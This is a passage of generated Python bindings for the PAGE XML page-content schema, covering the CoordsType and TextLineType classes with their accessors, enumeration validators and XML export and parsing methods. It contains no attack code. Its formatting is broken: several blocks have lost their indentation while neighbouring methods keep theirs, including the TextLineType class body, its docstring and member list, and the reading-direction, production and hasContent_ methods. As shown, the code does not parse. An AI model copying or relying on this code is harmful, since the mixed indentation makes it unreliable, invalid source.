            return CoordsType.subclass(*args_, **kwargs_)
        else:
            return CoordsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_points(self):
        return self.points
    def set_points(self, points):
        self.points = points
    def get_conf(self):
        return self.conf
    def set_conf(self, conf):
        self.conf = conf
    def validate_PointsType(self, value):
        """Validate *value* against pc:PointsType ('x,y x,y ...' pattern).

        Violations are recorded on self.gds_collector_; returns False on a
        base-type mismatch, otherwise None (callers discard the result).
        """
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            if not self.gds_validate_simple_patterns(
                    self.validate_PointsType_patterns_, value):
                self.gds_collector_.add_message('Value "%s" does not match xsd pattern restrictions: %s' % (encode_str_2_3(value), self.validate_PointsType_patterns_, ))
    validate_PointsType_patterns_ = [['^(([0-9]+,[0-9]+ )+([0-9]+,[0-9]+))$']]
    def validate_ConfSimpleType(self, value):
        """Validate *value* against pc:ConfSimpleType (xsd:float in [0, 1])."""
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, float):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
                return False
            if value < 0:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
            if value > 1:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
    def hasContent_(self):
        # CoordsType carries data only in its XML attributes; it never has
        # child element content.  (The generated original tested an empty
        # tuple here, which is always falsy.)
        return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CoordsType', pretty_print=True):
        """Serialize this Coords element to *outfile* as XML, indented to *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('CoordsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'CoordsType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='CoordsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='CoordsType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='CoordsType'):
        """Write the points and conf attributes (when set) to *outfile*."""
        if self.points is not None and 'points' not in already_processed:
            already_processed.add('points')
            outfile.write(' points=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.points), input_name='points')), ))
        if self.conf is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='CoordsType', fromsubclass_=False, pretty_print=True):
        # No child elements are defined for CoordsType.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this instance from an element-tree *node*; return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read points and conf from the XML attributes and validate them."""
        value = find_attr_value_('points', node)
        if value is not None and 'points' not in already_processed:
            already_processed.add('points')
            self.points = value
            self.validate_PointsType(self.points)    # validate type PointsType
        value = find_attr_value_('conf', node)
        if value is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            value = self.gds_parse_float(value, node, 'conf')
            self.conf = value
            self.validate_ConfSimpleType(self.conf)    # validate type ConfSimpleType
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements are defined for CoordsType.
        pass
# end class CoordsType
class TextLineType(GeneratedsSuper):
"""Overrides primaryLanguage attribute of parent text
region
The primary script used in the text line
The secondary script used in the text line
The direction in which text within the line
should be read (order of words and characters).
Overrides the production attribute of the parent
text region
For generic use
Position (order number) of this text line within the
parent text region."""
__hash__ = GeneratedsSuper.__hash__
member_data_items_ = [
MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
MemberSpec_('primaryLanguage', 'pc:LanguageSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('primaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('secondaryScript', 'pc:ScriptSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('readingDirection', 'pc:ReadingDirectionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('production', 'pc:ProductionSimpleType', 0, 1, {'use': 'optional'}),
MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
MemberSpec_('index', 'int', 0, 1, {'use': 'optional'}),
MemberSpec_('AlternativeImage', 'AlternativeImageType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'AlternativeImage', 'type': 'AlternativeImageType'}, None),
MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
MemberSpec_('Baseline', 'BaselineType', 0, 1, {'minOccurs': '0', 'name': 'Baseline', 'type': 'BaselineType'}, None),
MemberSpec_('Word', 'WordType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Word', 'type': 'WordType'}, None),
MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
MemberSpec_('TextStyle', 'TextStyleType', 0, 1, {'minOccurs': '0', 'name': 'TextStyle', 'type': 'TextStyleType'}, None),
MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
]
subclass = None
superclass = None
    def __init__(self, id=None, primaryLanguage=None, primaryScript=None, secondaryScript=None, readingDirection=None, production=None, custom=None, comments=None, index=None, AlternativeImage=None, Coords=None, Baseline=None, Word=None, TextEquiv=None, TextStyle=None, UserDefined=None, Labels=None, gds_collector_=None, **kwargs_):
        """Initialize a TextLineType element.

        Lower-case arguments map to XML attributes; capitalized arguments
        map to child elements.  List-valued children (AlternativeImage,
        Word, TextEquiv, Labels) default to fresh empty lists.
        """
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # XML attributes (scalars, cast on assignment).
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.primaryLanguage = _cast(None, primaryLanguage)
        self.primaryLanguage_nsprefix_ = None
        self.primaryScript = _cast(None, primaryScript)
        self.primaryScript_nsprefix_ = None
        self.secondaryScript = _cast(None, secondaryScript)
        self.secondaryScript_nsprefix_ = None
        self.readingDirection = _cast(None, readingDirection)
        self.readingDirection_nsprefix_ = None
        self.production = _cast(None, production)
        self.production_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        # Child elements.
        if AlternativeImage is None:
            self.AlternativeImage = []
        else:
            self.AlternativeImage = AlternativeImage
        self.AlternativeImage_nsprefix_ = "pc"
        self.Coords = Coords
        self.Coords_nsprefix_ = "pc"
        self.Baseline = Baseline
        self.Baseline_nsprefix_ = "pc"
        if Word is None:
            self.Word = []
        else:
            self.Word = Word
        self.Word_nsprefix_ = "pc"
        if TextEquiv is None:
            self.TextEquiv = []
        else:
            self.TextEquiv = TextEquiv
        self.TextEquiv_nsprefix_ = "pc"
        self.TextStyle = TextStyle
        self.TextStyle_nsprefix_ = "pc"
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        # Factory honoring generateDS's subclass-override hook: if an
        # external module registered a replacement for TextLineType,
        # instantiate that instead of the base class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, TextLineType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if TextLineType.subclass:
            return TextLineType.subclass(*args_, **kwargs_)
        else:
            return TextLineType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessors for the namespace prefix and the list-valued /
    # single-valued child elements.  ``insert_*_at``/``replace_*_at`` index
    # into the underlying Python list.
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_AlternativeImage(self):
        return self.AlternativeImage
    def set_AlternativeImage(self, AlternativeImage):
        self.AlternativeImage = AlternativeImage
    def add_AlternativeImage(self, value):
        self.AlternativeImage.append(value)
    def insert_AlternativeImage_at(self, index, value):
        self.AlternativeImage.insert(index, value)
    def replace_AlternativeImage_at(self, index, value):
        self.AlternativeImage[index] = value
    def get_Coords(self):
        return self.Coords
    def set_Coords(self, Coords):
        self.Coords = Coords
    def get_Baseline(self):
        return self.Baseline
    def set_Baseline(self, Baseline):
        self.Baseline = Baseline
    def get_Word(self):
        return self.Word
    def set_Word(self, Word):
        self.Word = Word
    def add_Word(self, value):
        self.Word.append(value)
    def insert_Word_at(self, index, value):
        self.Word.insert(index, value)
    def replace_Word_at(self, index, value):
        self.Word[index] = value
    # Generated accessors for TextEquiv (list), TextStyle, UserDefined and
    # Labels (list) children.
    def get_TextEquiv(self):
        return self.TextEquiv
    def set_TextEquiv(self, TextEquiv):
        self.TextEquiv = TextEquiv
    def add_TextEquiv(self, value):
        self.TextEquiv.append(value)
    def insert_TextEquiv_at(self, index, value):
        self.TextEquiv.insert(index, value)
    def replace_TextEquiv_at(self, index, value):
        self.TextEquiv[index] = value
    def get_TextStyle(self):
        return self.TextStyle
    def set_TextStyle(self, TextStyle):
        self.TextStyle = TextStyle
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    # Generated accessors for the XML attributes of this element.
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_primaryLanguage(self):
        return self.primaryLanguage
    def set_primaryLanguage(self, primaryLanguage):
        self.primaryLanguage = primaryLanguage
    def get_primaryScript(self):
        return self.primaryScript
    def set_primaryScript(self, primaryScript):
        self.primaryScript = primaryScript
    def get_secondaryScript(self):
        return self.secondaryScript
    def set_secondaryScript(self, secondaryScript):
        self.secondaryScript = secondaryScript
    def get_readingDirection(self):
        return self.readingDirection
    def set_readingDirection(self, readingDirection):
        self.readingDirection = readingDirection
    def get_production(self):
        return self.production
    def set_production(self, production):
        self.production = production
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def validate_LanguageSimpleType(self, value):
        # Validate type pc:LanguageSimpleType, a restriction on string.
        # Validation problems are reported through self.gds_collector_.
        # NOTE(review): the trailing ``result = False`` is dead code --
        # ``result`` is never initialised nor returned (a known generateDS
        # artifact); callers must inspect gds_collector_ messages instead.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            value = value
            enumerations = ['Abkhaz', 'Afar', 'Afrikaans', 'Akan', 'Albanian', 'Amharic', 'Arabic', 'Aragonese', 'Armenian', 'Assamese', 'Avaric', 'Avestan', 'Aymara', 'Azerbaijani', 'Bambara', 'Bashkir', 'Basque', 'Belarusian', 'Bengali', 'Bihari', 'Bislama', 'Bosnian', 'Breton', 'Bulgarian', 'Burmese', 'Cambodian', 'Cantonese', 'Catalan', 'Chamorro', 'Chechen', 'Chichewa', 'Chinese', 'Chuvash', 'Cornish', 'Corsican', 'Cree', 'Croatian', 'Czech', 'Danish', 'Divehi', 'Dutch', 'Dzongkha', 'English', 'Esperanto', 'Estonian', 'Ewe', 'Faroese', 'Fijian', 'Finnish', 'French', 'Fula', 'Gaelic', 'Galician', 'Ganda', 'Georgian', 'German', 'Greek', 'Guaraní', 'Gujarati', 'Haitian', 'Hausa', 'Hebrew', 'Herero', 'Hindi', 'Hiri Motu', 'Hungarian', 'Icelandic', 'Ido', 'Igbo', 'Indonesian', 'Interlingua', 'Interlingue', 'Inuktitut', 'Inupiaq', 'Irish', 'Italian', 'Japanese', 'Javanese', 'Kalaallisut', 'Kannada', 'Kanuri', 'Kashmiri', 'Kazakh', 'Khmer', 'Kikuyu', 'Kinyarwanda', 'Kirundi', 'Komi', 'Kongo', 'Korean', 'Kurdish', 'Kwanyama', 'Kyrgyz', 'Lao', 'Latin', 'Latvian', 'Limburgish', 'Lingala', 'Lithuanian', 'Luba-Katanga', 'Luxembourgish', 'Macedonian', 'Malagasy', 'Malay', 'Malayalam', 'Maltese', 'Manx', 'Māori', 'Marathi', 'Marshallese', 'Mongolian', 'Nauru', 'Navajo', 'Ndonga', 'Nepali', 'North Ndebele', 'Northern Sami', 'Norwegian', 'Norwegian Bokmål', 'Norwegian Nynorsk', 'Nuosu', 'Occitan', 'Ojibwe', 'Old Church Slavonic', 'Oriya', 'Oromo', 'Ossetian', 'Pāli', 'Panjabi', 'Pashto', 'Persian', 'Polish', 'Portuguese', 'Punjabi', 'Quechua', 'Romanian', 'Romansh', 'Russian', 'Samoan', 'Sango', 'Sanskrit', 'Sardinian', 'Serbian', 'Shona', 'Sindhi', 'Sinhala', 'Slovak', 'Slovene', 'Somali', 'South Ndebele', 'Southern Sotho', 'Spanish', 'Sundanese', 'Swahili', 'Swati', 'Swedish', 'Tagalog', 'Tahitian', 'Tajik', 'Tamil', 'Tatar', 'Telugu', 'Thai', 'Tibetan', 'Tigrinya', 'Tonga', 'Tsonga', 'Tswana', 'Turkish', 'Turkmen', 'Twi', 'Uighur', 'Ukrainian', 'Urdu', 'Uzbek', 'Venda', 'Vietnamese', 
                'Volapük', 'Walloon', 'Welsh', 'Western Frisian', 'Wolof', 'Xhosa', 'Yiddish', 'Yoruba', 'Zhuang', 'Zulu', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on LanguageSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
    def validate_ScriptSimpleType(self, value):
        # Validate type pc:ScriptSimpleType, a restriction on string.
        # Validation problems are reported through self.gds_collector_.
        # NOTE(review): the trailing ``result = False`` is dead code --
        # ``result`` is never initialised nor returned (generateDS artifact).
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            value = value
            enumerations = ['Adlm - Adlam', 'Afak - Afaka', 'Aghb - Caucasian Albanian', 'Ahom - Ahom, Tai Ahom', 'Arab - Arabic', 'Aran - Arabic (Nastaliq variant)', 'Armi - Imperial Aramaic', 'Armn - Armenian', 'Avst - Avestan', 'Bali - Balinese', 'Bamu - Bamum', 'Bass - Bassa Vah', 'Batk - Batak', 'Beng - Bengali', 'Bhks - Bhaiksuki', 'Blis - Blissymbols', 'Bopo - Bopomofo', 'Brah - Brahmi', 'Brai - Braille', 'Bugi - Buginese', 'Buhd - Buhid', 'Cakm - Chakma', 'Cans - Unified Canadian Aboriginal Syllabics', 'Cari - Carian', 'Cham - Cham', 'Cher - Cherokee', 'Cirt - Cirth', 'Copt - Coptic', 'Cprt - Cypriot', 'Cyrl - Cyrillic', 'Cyrs - Cyrillic (Old Church Slavonic variant)', 'Deva - Devanagari (Nagari)', 'Dsrt - Deseret (Mormon)', 'Dupl - Duployan shorthand, Duployan stenography', 'Egyd - Egyptian demotic', 'Egyh - Egyptian hieratic', 'Egyp - Egyptian hieroglyphs', 'Elba - Elbasan', 'Ethi - Ethiopic', 'Geok - Khutsuri (Asomtavruli and Nuskhuri)', 'Geor - Georgian (Mkhedruli)', 'Glag - Glagolitic', 'Goth - Gothic', 'Gran - Grantha', 'Grek - Greek', 'Gujr - Gujarati', 'Guru - Gurmukhi', 'Hanb - Han with Bopomofo', 'Hang - Hangul', 'Hani - Han (Hanzi, Kanji, Hanja)', 'Hano - Hanunoo (Hanunóo)', 'Hans - Han (Simplified variant)', 'Hant - Han (Traditional variant)', 'Hatr - Hatran', 'Hebr - Hebrew', 'Hira - Hiragana', 'Hluw - Anatolian Hieroglyphs', 'Hmng - Pahawh Hmong', 'Hrkt - Japanese syllabaries', 'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha 
(Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 
'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ProductionSimpleType(self, value):
# Validate type pc:ProductionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['printed', 'typewritten', 'handwritten-cursive', 'handwritten-printscript', 'medieval-manuscript', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ProductionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Coords is not None or
self.Baseline is not None or
self.Word or
self.TextEquiv or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextLineType', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*.

        *level* controls indentation depth; a self-closing tag is written
        when hasContent_() is False.
        """
        # Allow externally-registered namespace definitions to override.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('TextLineType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name the element was parsed with, if any.
        if self.original_tagname_ is not None and name_ == 'TextLineType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TextLineType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TextLineType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TextLineType'):
        """Write this element's XML attributes to *outfile*.

        *already_processed* tracks attribute names so subclass overrides do
        not emit an attribute twice.
        """
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.primaryLanguage is not None and 'primaryLanguage' not in already_processed:
            already_processed.add('primaryLanguage')
            outfile.write(' primaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryLanguage), input_name='primaryLanguage')), ))
        if self.primaryScript is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
        if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
        if self.readingDirection is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
        if self.production is not None and 'production' not in already_processed:
            already_processed.add('production')
            outfile.write(' production=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.production), input_name='production')), ))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TextLineType', fromsubclass_=False, pretty_print=True):
        """Write all child elements to *outfile* in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Each child's captured namespace prefix is applied only when
        # UseCapturedNS_ is enabled.
        for AlternativeImage_ in self.AlternativeImage:
            namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
            AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
        if self.Coords is not None:
            namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
            self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
        if self.Baseline is not None:
            namespaceprefix_ = self.Baseline_nsprefix_ + ':' if (UseCapturedNS_ and self.Baseline_nsprefix_) else ''
            self.Baseline.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Baseline', pretty_print=pretty_print)
        for Word_ in self.Word:
            namespaceprefix_ = self.Word_nsprefix_ + ':' if (UseCapturedNS_ and self.Word_nsprefix_) else ''
            Word_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Word', pretty_print=pretty_print)
        for TextEquiv_ in self.TextEquiv:
            namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
            TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
        if self.TextStyle is not None:
            namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
            self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
